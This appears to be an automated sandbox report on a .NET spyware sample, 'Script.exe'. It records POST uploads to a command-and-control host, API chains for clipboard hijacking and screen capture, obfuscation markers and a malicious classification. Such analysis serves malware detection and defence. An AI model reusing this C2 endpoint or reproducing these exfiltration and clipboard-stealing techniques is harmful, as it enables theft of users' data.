Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=857CJA9RMRQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1222Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6VMVRVQYONVT1LLEUWLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 568902Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: fancywaxxers.shop

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: fancywaxxers.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop

Source: Script.exe	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: Script.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: Script.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Script.exe	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: Script.exe	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: Script.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: Script.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Script.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: Script.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: Script.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: Script.exe	String found in binary or memory: http://ocsp.entrust.net02
Source: Script.exe	String found in binary or memory: http://ocsp.entrust.net03
Source: Amcache.hve.5.dr	String found in binary or memory: http://upx.sf.net
Source: Script.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: Script.exe	String found in binary or memory: http://www.entrust.net/rpa03
Source: Script.exe, 00000002.00000002.3253797815.0000000003DE2000.00000004.00000800.00020000.00000000.sdmp, Script.exe, 00000002.00000002.3253440028.00000000016CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/
Source: Script.exe, 00000002.00000002.3253212983.000000000162C000.00000004.00000020.00020000.00000000.sdmp, Script.exe, 00000002.00000002.3253440028.00000000016CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/api
Source: Script.exe, 00000002.00000002.3253440028.00000000016CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/apiT
Source: Script.exe, 00000002.00000002.3253440028.00000000016CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/apiY
Source: Script.exe, 00000002.00000002.3253312879.000000000165B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/m
Source: Script.exe, 00000002.00000002.3253440028.00000000016CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/t
Source: Script.exe	String found in binary or memory: https://www.entrust.net/rpa0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49724 version: TLS 1.2

Source: C:\Users\user\Desktop\Script.exe

Code function: 2_2_00437140 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

2_2_00437140

Source: C:\Users\user\Desktop\Script.exe

Code function: 2_2_03BD1000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,

2_2_03BD1000

Source: C:\Users\user\Desktop\Script.exe

Code function: 2_2_00437140 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

2_2_00437140

Source: C:\Users\user\Desktop\Script.exe

Code function: 2_2_004376F7 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

2_2_004376F7

Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00412800	2_2_00412800
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_0043180D	2_2_0043180D
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_004110D7	2_2_004110D7
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00429080	2_2_00429080
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00408A60	2_2_00408A60
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_0043BAC0	2_2_0043BAC0
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_0040DB46	2_2_0040DB46
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00422350	2_2_00422350
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00442C50	2_2_00442C50
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_0043BD30	2_2_0043BD30
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_004435F0	2_2_004435F0
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_004156D0	2_2_004156D0
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00425F4E	2_2_00425F4E
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00436869	2_2_00436869
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_0043D070	2_2_0043D070
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00443000	2_2_00443000
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00442000	2_2_00442000
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_0042C01F	2_2_0042C01F
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_0040B0F0	2_2_0040B0F0
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_0043C880	2_2_0043C880
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_0043608B	2_2_0043608B
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_0043108D	2_2_0043108D
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00427E78	2_2_00427E78
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00403950	2_2_00403950
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_0041C163	2_2_0041C163
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_0043B170	2_2_0043B170
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_0044197F	2_2_0044197F
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00442100	2_2_00442100
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_0041C908	2_2_0041C908
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00439916	2_2_00439916
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_004179EC	2_2_004179EC
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00406180	2_2_00406180
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_004069B0	2_2_004069B0
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_004421B0	2_2_004421B0
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_004311BC	2_2_004311BC
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00442240	2_2_00442240
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00416F52	2_2_00416F52
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_0042AA7E	2_2_0042AA7E
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_0042B200	2_2_0042B200
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_0041D224	2_2_0041D224
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_0041D237	2_2_0041D237
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00409AD0	2_2_00409AD0
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_0041DAD0	2_2_0041DAD0
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_0043CAD0	2_2_0043CAD0
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00422AA0	2_2_00422AA0
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_0041AAB0	2_2_0041AAB0
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_004432B0	2_2_004432B0
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00405B60	2_2_00405B60
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00402B70	2_2_00402B70
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00404300	2_2_00404300
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00426B30	2_2_00426B30
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_0043B3D0	2_2_0043B3D0
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00414BF0	2_2_00414BF0
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_0042EBA0	2_2_0042EBA0
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00419C50	2_2_00419C50
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00433C64	2_2_00433C64
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00431C20	2_2_00431C20
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_0040F430	2_2_0040F430
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00411CC5	2_2_00411CC5
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_004124DD	2_2_004124DD
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_0041ACF9	2_2_0041ACF9
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00408D50	2_2_00408D50
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00429550	2_2_00429550
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00426570	2_2_00426570
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00429570	2_2_00429570
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00406520	2_2_00406520
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_004425C0	2_2_004425C0
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_0041E5D0	2_2_0041E5D0
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_004095E0	2_2_004095E0
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00425DE0	2_2_00425DE0
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_0043559A	2_2_0043559A
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00427E78	2_2_00427E78
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_0041D6C0	2_2_0041D6C0
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_0041DED0	2_2_0041DED0
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00434ED0	2_2_00434ED0
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00441ED0	2_2_00441ED0
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_0042A6E9	2_2_0042A6E9
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00404E80	2_2_00404E80
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_004306B1	2_2_004306B1
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00428740	2_2_00428740
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00402F50	2_2_00402F50
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00416F52	2_2_00416F52
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00436F50	2_2_00436F50
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00434771	2_2_00434771
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_0041870B	2_2_0041870B
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00439F15	2_2_00439F15
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_0041A7D0	2_2_0041A7D0
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00427780	2_2_00427780
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_0043F780	2_2_0043F780
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_0042078E	2_2_0042078E
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_00407790	2_2_00407790
Source: C:\Users\user\Desktop\Script.exe	Code function: 2_2_0040DF91	2_2_0040DF91

Source: C:\Users\user\Desktop\Script.exe	Code function: String function: 00408320 appears 45 times
Source: C:\Users\user\Desktop\Script.exe	Code function: String function: 00414BE0 appears 108 times

Source: C:\Users\user\Desktop\Script.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 140

Source: Script.exe

Static PE information: invalid certificate

Source: Script.exe, 00000000.00000002.2036187411.0000000003979000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameHandler.exe0 vs Script.exe
Source: Script.exe, 00000000.00000002.2035769386.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Script.exe
Source: Script.exe, 00000000.00000000.2001576225.0000000000482000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameHandler.exe0 vs Script.exe
Source: Script.exe	Binary or memory string: OriginalFilenameHandler.exe0 vs Script.exe

Source: Script.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: Script.exe

Static PE information: Section: .BSS ZLIB complexity 1.000329143481717

Source: Script.exe, vq3eeWeR9wjKffmTlE.cs	Cryptographic APIs: 'CreateDecryptor'
Source: Script.exe, vq3eeWeR9wjKffmTlE.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Script.exe.3979550.0.raw.unpack, vq3eeWeR9wjKffmTlE.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Script.exe.3979550.0.raw.unpack, vq3eeWeR9wjKffmTlE.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/5@1/1

Source: C:\Users\user\Desktop\Script.exe

Code function: 2_2_0043BD30 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

2_2_0043BD30

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5060
Source: C:\Users\user\Desktop\Script.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5624:120:WilError_03

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\c5fb3905-4e84-499b-8a83-a157b19831c5

Jump to behavior

Source: Script.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Script.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\Script.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Script.exe	ReversingLabs: Detection: 44%
Source: Script.exe	Virustotal: Detection: 52%

Source: C:\Users\user\Desktop\Script.exe

File read: C:\Users\user\Desktop\Script.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Script.exe "C:\Users\user\Desktop\Script.exe"
Source: C:\Users\user\Desktop\Script.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Script.exe	Process created: C:\Users\user\Desktop\Script.exe "C:\Users\user\Desktop\Script.exe"
Source: C:\Users\user\Desktop\Script.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 140
Source: C:\Users\user\Desktop\Script.exe	Process created: C:\Users\user\Desktop\Script.exe "C:\Users\user\Desktop\Script.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Script.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: Script.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Script.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Script.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: System.Windows.Forms.pdb source: WER576.tmp.dmp.5.dr
Source:	Binary string: mscorlib.pdb source: WER576.tmp.dmp.5.dr
Source:	Binary string: System.ni.pdbRSDS source: WER576.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdb source: WER576.tmp.dmp.5.dr
Source:	Binary string: Handler.pdb source: Script.exe, WER576.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER576.tmp.dmp.5.dr
Source:	Binary string: System.ni.pdb source: WER576.tmp.dmp.5.dr
Source:	Binary string: System.pdb source: WER576.tmp.dmp.5.dr

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: Script.exe, vq3eeWeR9wjKffmTlE.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.Script.exe.3979550.0.raw.unpack, vq3eeWeR9wjKffmTlE.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: Script.exe

Static PE information: 0xB98C4C41 [Thu Aug 23 20:32:01 2068 UTC]

Source: Script.exe, vCg2VT5p7jXNk50llbq.cs	High entropy of concatenated method names: 'OkE5tnHZaj', 'quL5gsUNKs', 'eLK5c84hpa', 'gXo58eGg5j', 'GW55mMYBwj', 'dbk5nDS4d7', 'YJd5ONDt15', 'tsG5SJZu72', 'FvJ53MSI6H', 'NUD52Skowi'
Source: Script.exe, vq3eeWeR9wjKffmTlE.cs	High entropy of concatenated method names: 'RmVqL4ujd4', 'nW4lBacjpc', 'IAr5ATjHqU', 'UIx5yCnXZI', 'oQd5WcYeRd', 'qXl50hRD5T', 'oR65zJ81n2', 'jQiB7OERf', 'LicZSc09T', 'a2jGlQURl'
Source: 0.2.Script.exe.3979550.0.raw.unpack, vCg2VT5p7jXNk50llbq.cs	High entropy of concatenated method names: 'OkE5tnHZaj', 'quL5gsUNKs', 'eLK5c84hpa', 'gXo58eGg5j', 'GW55mMYBwj', 'dbk5nDS4d7', 'YJd5ONDt15', 'tsG5SJZu72', 'FvJ53MSI6H', 'NUD52Skowi'
Source: 0.2.Script.exe.3979550.0.raw.unpack, vq3eeWeR9wjKffmTlE.cs	High entropy of concatenated method names: 'RmVqL4ujd4', 'nW4lBacjpc', 'IAr5ATjHqU', 'UIx5yCnXZI', 'oQd5WcYeRd', 'qXl50hRD5T', 'oR65zJ81n2', 'jQiB7OERf', 'LicZSc09T', 'a2jGlQURl'

Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
